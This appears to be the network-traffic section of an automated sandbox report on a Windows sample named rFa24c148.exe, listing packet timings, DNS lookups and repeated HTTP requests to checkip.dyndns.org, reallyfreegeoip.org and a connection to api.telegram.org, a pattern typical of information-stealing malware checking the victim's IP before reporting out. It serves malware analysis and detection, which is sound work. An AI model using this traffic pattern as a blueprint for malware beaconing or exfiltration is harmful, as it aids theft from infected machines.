                                                                                            Oct 28, 2024 02:02:51.923145056 CET4974380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:51.923261881 CET4974380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:51.928478003 CET8049743193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:52.760802031 CET8049743193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:52.762217999 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:52.762249947 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:52.762332916 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:52.762584925 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:52.762595892 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:52.814455986 CET4974380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:53.378767014 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:53.380764008 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:53.380779028 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:53.524478912 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:53.524648905 CET44349744188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:53.530189991 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:53.530430079 CET49744443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:53.535866976 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:53.541269064 CET8049745193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:53.541385889 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:53.541467905 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:53.546756029 CET8049745193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:54.391597033 CET8049745193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:54.393779993 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:54.393820047 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:54.393910885 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:54.394126892 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:54.394136906 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:54.439582109 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.017432928 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.018891096 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:55.018907070 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.203952074 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.204101086 CET44349746188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.204292059 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:55.204899073 CET49746443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:55.208581924 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.209847927 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.214185953 CET8049745193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.214248896 CET4974580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.215121031 CET8049747193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:55.215184927 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.215298891 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:55.220556974 CET8049747193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.054059982 CET8049747193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.055643082 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.055690050 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.055775881 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.056015968 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.056032896 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.095792055 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.659238100 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.660617113 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.660645962 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.804112911 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.804256916 CET44349749188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.804315090 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.804578066 CET49749443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:56.808340073 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.809312105 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.814176083 CET8049747193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.814237118 CET4974780192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.814644098 CET8049751193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:56.814704895 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.814790010 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:56.820040941 CET8049751193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:57.654194117 CET8049751193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:57.659692049 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:57.659778118 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:57.659879923 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:57.660162926 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:57.660197973 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:57.705089092 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.266302109 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.269269943 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:58.269365072 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.445075989 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.445210934 CET44349757188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.445281982 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:58.445856094 CET49757443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:58.449623108 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.451164961 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.455622911 CET8049751193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.455703974 CET4975180192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.456537008 CET8049763193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:58.456754923 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.456933022 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:58.462269068 CET8049763193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:59.302843094 CET8049763193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:02:59.308115005 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:59.308217049 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:59.308324099 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:59.308542013 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:59.308573008 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:59.345729113 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:02:59.920805931 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:02:59.922557116 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:02:59.922633886 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.071676016 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.071726084 CET44349769188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.071813107 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:00.072345972 CET49769443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:00.075906992 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:00.077111006 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:00.081600904 CET8049763193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.081711054 CET4976380192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:00.082472086 CET8049775193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.082561970 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:00.082700968 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:00.087958097 CET8049775193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.922084093 CET8049775193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.923645020 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:00.923670053 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.923799992 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:00.924091101 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:00.924103022 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:00.970715046 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:01.543488979 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.544962883 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:01.544987917 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.696820021 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.696887970 CET44349781188.114.96.3192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.696939945 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:01.697493076 CET49781443192.168.2.4188.114.96.3
                                                                                            Oct 28, 2024 02:03:01.741069078 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:01.746823072 CET8049775193.122.6.168192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.746903896 CET4977580192.168.2.4193.122.6.168
                                                                                            Oct 28, 2024 02:03:01.749778986 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:01.749811888 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.749881983 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:01.750332117 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:01.750346899 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.582799911 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.582894087 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:02.584544897 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:02.584558964 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.584880114 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.586139917 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:02.631330013 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.819597006 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.819758892 CET44349787149.154.167.220192.168.2.4
                                                                                            Oct 28, 2024 02:03:02.819933891 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:02.837275982 CET49787443192.168.2.4149.154.167.220
                                                                                            Oct 28, 2024 02:03:08.744673967 CET4974380192.168.2.4193.122.6.168
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 28, 2024 02:02:40.300445080 CET5670253192.168.2.41.1.1.1
                                                                                            Oct 28, 2024 02:02:40.308408976 CET53567021.1.1.1192.168.2.4
                                                                                            Oct 28, 2024 02:02:41.660851955 CET5531653192.168.2.41.1.1.1
                                                                                            Oct 28, 2024 02:02:41.668683052 CET53553161.1.1.1192.168.2.4
                                                                                            Oct 28, 2024 02:02:46.724473953 CET4953053192.168.2.41.1.1.1
                                                                                            Oct 28, 2024 02:02:46.732223988 CET53495301.1.1.1192.168.2.4
                                                                                            Oct 28, 2024 02:02:48.194356918 CET5580753192.168.2.41.1.1.1
                                                                                            Oct 28, 2024 02:02:48.203335047 CET53558071.1.1.1192.168.2.4
                                                                                            Oct 28, 2024 02:03:01.741662025 CET5628053192.168.2.41.1.1.1
                                                                                            Oct 28, 2024 02:03:01.749072075 CET53562801.1.1.1192.168.2.4
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 28, 2024 02:02:40.300445080 CET192.168.2.41.1.1.10xb027Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:41.660851955 CET192.168.2.41.1.1.10x3359Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.724473953 CET192.168.2.41.1.1.10x5f54Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:48.194356918 CET192.168.2.41.1.1.10x8efaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:03:01.741662025 CET192.168.2.41.1.1.10x7de9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 28, 2024 02:02:40.308408976 CET1.1.1.1192.168.2.40xb027No error (0)drive.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:41.668683052 CET1.1.1.1192.168.2.40x3359No error (0)drive.usercontent.google.com142.250.185.225A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:46.732223988 CET1.1.1.1192.168.2.40x5f54No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:48.203335047 CET1.1.1.1192.168.2.40x8efaNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:02:48.203335047 CET1.1.1.1192.168.2.40x8efaNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                            Oct 28, 2024 02:03:01.749072075 CET1.1.1.1192.168.2.40x7de9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                            • drive.google.com
                                                                                            • drive.usercontent.google.com
                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449738193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:46.742029905 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:02:47.584932089 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:47 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: a38f24765a2eb198d59481604ff4958c
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                                                                            Oct 28, 2024 02:02:47.717155933 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 28, 2024 02:02:47.964955091 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:47 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: a6d1591616e2faf0917ba790f77d8b6b
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                                                                            Oct 28, 2024 02:02:49.215886116 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 28, 2024 02:02:49.462076902 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:49 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: c8629cb75c018ffa8572f273e81e8403
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449741193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:50.300966024 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 28, 2024 02:02:51.126579046 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:51 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: bdc3716a2321e9c725f48e6473892b07
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449743193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:51.923261881 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Oct 28, 2024 02:02:52.760802031 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:52 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: cfc2fff10049a331ceb328ce691edf3b
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449745193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:53.541467905 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:02:54.391597033 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:54 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: c39200e6a9dbcc04a52a595f9ce9b159
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449747193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:55.215298891 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:02:56.054059982 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:55 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 078569191f57a612610bef8dc71091be
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449751193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:56.814790010 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:02:57.654194117 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:57 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 748c3a6e50236af62b8ab4913e9e8e5d
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449763193.122.6.168807732C:\Users\user\Desktop\rFa24c148.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 28, 2024 02:02:58.456933022 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Oct 28, 2024 02:02:59.302843094 CET323INHTTP/1.1 200 OK
                                                                                            Date: Mon, 28 Oct 2024 01:02:59 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 106
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            X-Request-ID: 37ad6314b0894e2ee5075dbd73310d49
